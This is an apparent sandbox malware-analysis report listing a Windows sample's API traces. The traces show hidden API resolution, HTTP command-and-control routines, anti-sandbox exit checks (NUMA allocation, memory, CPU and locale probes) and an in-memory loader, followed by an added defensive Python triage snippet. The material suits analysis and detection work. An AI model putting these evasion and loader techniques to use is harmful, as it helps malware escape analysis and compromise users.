                                                        • GetProcAddress.KERNEL32(75290000,00829708), ref: 0041A123
                                                        • GetProcAddress.KERNEL32(75290000,007F8300), ref: 0041A13B
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F7EC0), ref: 0041A160
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F8320), ref: 0041A179
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F7C68), ref: 0041A191
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829720), ref: 0041A1A9
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829768), ref: 0041A1C2
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F83E0), ref: 0041A1DA
                                                        • GetProcAddress.KERNEL32(6FCD0000,007F8160), ref: 0041A1F2
                                                        • GetProcAddress.KERNEL32(6FCD0000,00829738), ref: 0041A20B
                                                        • GetProcAddress.KERNEL32(752C0000,007F83C0), ref: 0041A22C
                                                        • GetProcAddress.KERNEL32(752C0000,007F8440), ref: 0041A244
                                                        • GetProcAddress.KERNEL32(752C0000,008297B0), ref: 0041A25D
                                                        • GetProcAddress.KERNEL32(752C0000,008297E0), ref: 0041A275
                                                        • GetProcAddress.KERNEL32(752C0000,007F8080), ref: 0041A28D
                                                        • GetProcAddress.KERNEL32(74EC0000,007F79E8), ref: 0041A2B3
                                                        • GetProcAddress.KERNEL32(74EC0000,007F7BA0), ref: 0041A2CB
                                                        • GetProcAddress.KERNEL32(74EC0000,00829798), ref: 0041A2E3
                                                        • GetProcAddress.KERNEL32(74EC0000,007F8100), ref: 0041A2FC
                                                        • GetProcAddress.KERNEL32(74EC0000,007F80E0), ref: 0041A314
                                                        • GetProcAddress.KERNEL32(74EC0000,007F78D0), ref: 0041A32C
                                                        • GetProcAddress.KERNEL32(75BD0000,008297C8), ref: 0041A352
                                                        • GetProcAddress.KERNEL32(75BD0000,007F8140), ref: 0041A36A
                                                        • GetProcAddress.KERNEL32(75BD0000,00826878), ref: 0041A382
                                                        • GetProcAddress.KERNEL32(75BD0000,00829750), ref: 0041A39B
                                                        • GetProcAddress.KERNEL32(75BD0000,00829780), ref: 0041A3B3
                                                        • GetProcAddress.KERNEL32(75BD0000,007F81A0), ref: 0041A3CB
                                                        • GetProcAddress.KERNEL32(75BD0000,007F8120), ref: 0041A3E4
                                                        • GetProcAddress.KERNEL32(75BD0000,008299F0), ref: 0041A3FC
                                                        • GetProcAddress.KERNEL32(75BD0000,00829A50), ref: 0041A414
                                                        • GetProcAddress.KERNEL32(75A70000,007F80A0), ref: 0041A436
                                                        • GetProcAddress.KERNEL32(75A70000,00829A38), ref: 0041A44E
                                                        • GetProcAddress.KERNEL32(75A70000,00829A68), ref: 0041A466
                                                        • GetProcAddress.KERNEL32(75A70000,00829858), ref: 0041A47F
                                                        • GetProcAddress.KERNEL32(75A70000,008298B8), ref: 0041A497
                                                        • GetProcAddress.KERNEL32(75450000,007F82C0), ref: 0041A4B8
                                                        • GetProcAddress.KERNEL32(75450000,007F8400), ref: 0041A4D1
                                                        • GetProcAddress.KERNEL32(75DA0000,007F82E0), ref: 0041A4F2
                                                        • GetProcAddress.KERNEL32(75DA0000,00829AF8), ref: 0041A50A
                                                        • GetProcAddress.KERNEL32(6F070000,007F8360), ref: 0041A530
                                                        • GetProcAddress.KERNEL32(6F070000,007F8340), ref: 0041A548
                                                        • GetProcAddress.KERNEL32(6F070000,007F8380), ref: 0041A560
                                                        • GetProcAddress.KERNEL32(6F070000,00829B10), ref: 0041A579
                                                        • GetProcAddress.KERNEL32(6F070000,007F83A0), ref: 0041A591
                                                        • GetProcAddress.KERNEL32(6F070000,007F8420), ref: 0041A5A9
                                                        • GetProcAddress.KERNEL32(6F070000,007F8060), ref: 0041A5C2
                                                        • GetProcAddress.KERNEL32(6F070000,007F8180), ref: 0041A5DA
                                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                                        • GetProcAddress.KERNEL32(75AF0000,00829AB0), ref: 0041A629
                                                        • GetProcAddress.KERNEL32(75AF0000,008266F8), ref: 0041A641
                                                        • GetProcAddress.KERNEL32(75AF0000,008299D8), ref: 0041A659
                                                        • GetProcAddress.KERNEL32(75AF0000,00829A80), ref: 0041A672
                                                        • GetProcAddress.KERNEL32(75D90000,007F8200), ref: 0041A693
                                                        • GetProcAddress.KERNEL32(6CAD0000,008299A8), ref: 0041A6B4
                                                        • GetProcAddress.KERNEL32(6CAD0000,007F81C0), ref: 0041A6CD
                                                        • GetProcAddress.KERNEL32(6CAD0000,00829AC8), ref: 0041A6E5
                                                        • GetProcAddress.KERNEL32(6CAD0000,00829918), ref: 0041A6FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                                        • API String ID: 2238633743-1775429166
                                                        • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                        • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                        Control-flow Graph

                                                        control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                        APIs
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA258), ref: 004198A1
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA228), ref: 004198BA
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA168), ref: 004198D2
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA2A0), ref: 004198EA
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0F0), ref: 00419903
                                                        • GetProcAddress.KERNEL32(74DD0000,008266D8), ref: 0041991B
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8640), ref: 00419933
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8760), ref: 0041994C
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA000), ref: 00419964
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA150), ref: 0041997C
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0D8), ref: 00419995
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA018), ref: 004199AD
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84C0), ref: 004199C5
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA030), ref: 004199DE
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA180), ref: 004199F6
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8800), ref: 00419A0E
                                                        • GetProcAddress.KERNEL32(74DD0000,007F9FB8), ref: 00419A27
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA108), ref: 00419A3F
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8620), ref: 00419A57
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0A8), ref: 00419A70
                                                        • GetProcAddress.KERNEL32(74DD0000,007F86E0), ref: 00419A88
                                                        • LoadLibraryA.KERNEL32(007F9FE8,?,00416A00), ref: 00419A9A
                                                        • LoadLibraryA.KERNEL32(007FA198,?,00416A00), ref: 00419AAB
                                                        • LoadLibraryA.KERNEL32(007FA048,?,00416A00), ref: 00419ABD
                                                        • LoadLibraryA.KERNEL32(007FA060,?,00416A00), ref: 00419ACF
                                                        • LoadLibraryA.KERNEL32(007FA1B0,?,00416A00), ref: 00419AE0
                                                        • GetProcAddress.KERNEL32(75A70000,007F9FD0), ref: 00419B02
                                                        • GetProcAddress.KERNEL32(75290000,007FA078), ref: 00419B23
                                                        • GetProcAddress.KERNEL32(75290000,007FA120), ref: 00419B3B
                                                        • GetProcAddress.KERNEL32(75BD0000,007FA210), ref: 00419B5D
                                                        • GetProcAddress.KERNEL32(75450000,007F8500), ref: 00419B7E
                                                        • GetProcAddress.KERNEL32(76E90000,00826808), ref: 00419B9F
                                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                                        Strings
                                                        • NtQueryInformationProcess, xrefs: 00419BAA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: NtQueryInformationProcess
                                                        • API String ID: 2238633743-2781105232

                                                        Control-flow Graph (function at 00404880; rendered graph not reproduced)
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 0040493A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0082B8D0), ref: 00404DE8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                        • HttpOpenRequestA.WININET(00000000,0082B8B0,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00404B15
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 2402878923-2180234286

                                                        Control-flow Graph (function at 00406280; rendered graph not reproduced)
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID: ERROR$ERROR$GET
                                                        • API String ID: 3074848878-2509457195

                                                        Control-flow Graph (function at 004117A0; rendered graph not reproduced)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID: block
                                                        • API String ID: 3407564107-2199623458

                                                        Control-flow Graph (function at 00415510; rendered graph not reproduced)
                                                        APIs
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                          • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                        • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3630751533-2791005934

                                                        Control-flow Graph (function at 00417500; rendered graph not reproduced)
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                        • wsprintfA.USER32 ref: 00417640
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\
                                                        • API String ID: 3790021787-3809124531
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                        Control-flow Graph
                                                        • Graph image not extracted. Basic blocks b2003c-b2091d; API calls VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA; internal calls b20a3f, b20e0f, b20d90, b20a69, b20cce, b20ce7.
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B2024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: b9ac43faf0e425f66e751f636274e19294a2a96a06a7e17410e8e14007054894
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 72527974A11229DFDB64CF58D984BA8BBB1BF09304F1480D9E90DAB352DB30AE85DF14
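The report prints VirtualAlloc-family arguments as raw hex, which is where most of the signal in this B20000 region sits. The following Python is an added example, not part of the Joe Sandbox report and not the sample's code: it decodes those arguments with the documented winnt.h constants and gives a triage verdict. It takes the VirtualAlloc line of this region (flAllocationType 00001000, flProtect 00000004, with VirtualProtect and LoadLibraryA following in the control-flow graph) and, for the 00401110 helper listed under the startup routine further down, the stack values the report shows at its GetCurrentProcess call (000007D0, 00003000, 00000040, 00000000). Reading those stack values as the dwSize, flAllocationType, flProtect and nndPreferred already pushed for the VirtualAllocExNuma that follows is this example's inference, not something the report states; the "manual mapping pattern" label is likewise a heuristic of the example.

```python
import re

# Documented Win32 constants (winnt.h); only the subset relevant to triage.
ALLOCATION_TYPES = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
    0x00400000: "MEM_PHYSICAL",
    0x20000000: "MEM_LARGE_PAGES",
}
PAGE_PROTECTIONS = {  # base protections are exclusive values, not bits
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PROTECTION_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE_BASES = {0x10, 0x20, 0x40, 0x80}

# Report lines copied from this page. Joe Sandbox prints the stack at call time,
# so the GetCurrentProcess line carries values the caller has already pushed for
# the VirtualAllocExNuma that follows it (an inference, see the lead-in).
VIRTUAL_ALLOC_LINE = "VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B2024D"
NUMA_STACK_LINE = ("GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,"
                   "00000000,?,?,00416A1C), ref: 0040112B")
# Call order of the B20000 function, taken from its control-flow graph above.
B20000_CALL_ORDER = ["VirtualAlloc", "VirtualProtect", "VirtualFree", "LoadLibraryA"]

CALL_RE = re.compile(r"(\w+)\.KERNEL32\(([^)]*)\)")


def parse_call_args(line):
    """Return (api, args) with hex args as ints and '?' (unresolved) as None."""
    m = CALL_RE.search(line)
    if not m:
        raise ValueError("no KERNEL32 call on line: %r" % line)
    args = [None if a == "?" else int(a, 16) for a in m.group(2).split(",")]
    return m.group(1), args


def decode_allocation_type(value):
    names = [name for bit, name in ALLOCATION_TYPES.items() if value & bit]
    unknown = value & ~sum(ALLOCATION_TYPES)
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) or "0"


def decode_protection(value):
    names = [PAGE_PROTECTIONS.get(value & 0xFF, hex(value & 0xFF))]
    names += [name for bit, name in PROTECTION_MODIFIERS.items() if value & bit]
    return "|".join(names)


def is_executable(protect):
    return (protect & 0xFF) in EXECUTABLE_BASES


def describe_allocation(size, alloc_type, protect, later_calls=()):
    """Summarise one VirtualAlloc-family call and the follow-up it gets.

    later_calls is the API sequence after the allocation in the same function;
    a VirtualProtect there means a read/write allocation can still become code.
    """
    executable = is_executable(protect)
    if executable:
        verdict = "executable at allocation"
    elif "VirtualProtect" in later_calls:
        verdict = "read/write now, re-protected later (manual mapping pattern)"
    else:
        verdict = "non-executable"
    return {
        "size": size,
        "type": decode_allocation_type(alloc_type),
        "protect": decode_protection(protect),
        "executable": executable,
        "verdict": verdict,
    }


def triage_b20000():
    """The VirtualAlloc inside the non-PE-backed B20000 region."""
    _api, args = parse_call_args(VIRTUAL_ALLOC_LINE)
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
    return describe_allocation(args[1], args[2], args[3], B20000_CALL_ORDER[1:])


def triage_numa_probe():
    """The VirtualAllocExNuma in helper 00401110, from the pushed stack values."""
    _api, args = parse_call_args(NUMA_STACK_LINE)
    # pushed so far: lpAddress, dwSize, flAllocationType, flProtect, nndPreferred
    return describe_allocation(args[1], args[2], args[3])


if __name__ == "__main__":
    for name, result in (("B20000 VirtualAlloc", triage_b20000()),
                         ("00401110 VirtualAllocExNuma", triage_numa_probe())):
        print(name, result)
```

The two calls come out differently on purpose: the B20000 allocation is PAGE_READWRITE with a VirtualProtect afterwards, which is how a loader that copies a PE image into memory and then fixes section permissions looks, while the 00401110 helper asks for 0x7D0 bytes of PAGE_EXECUTE_READWRITE and then exits, which only makes sense as a check that VirtualAllocExNuma exists and succeeds.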

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA258), ref: 004198A1
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA228), ref: 004198BA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA168), ref: 004198D2
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA2A0), ref: 004198EA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA0F0), ref: 00419903
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008266D8), ref: 0041991B
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F8640), ref: 00419933
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F8760), ref: 0041994C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA000), ref: 00419964
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA150), ref: 0041997C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA0D8), ref: 00419995
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA018), ref: 004199AD
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007F84C0), ref: 004199C5
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,007FA030), ref: 004199DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                          • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                          • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                          • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                          • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                          • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                          • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                          • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                          • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                        • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
